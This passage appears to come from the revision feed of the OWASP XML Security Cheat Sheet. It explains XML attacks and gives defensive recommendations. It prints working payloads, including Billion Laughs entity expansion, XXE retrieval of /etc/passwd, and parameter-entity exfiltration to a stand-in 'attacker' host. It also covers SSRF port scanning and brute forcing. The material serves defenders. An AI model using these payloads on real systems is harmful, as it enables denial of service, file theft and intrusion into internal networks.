  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224417</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224417"/>
				<updated>2016-12-21T19:04:23Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
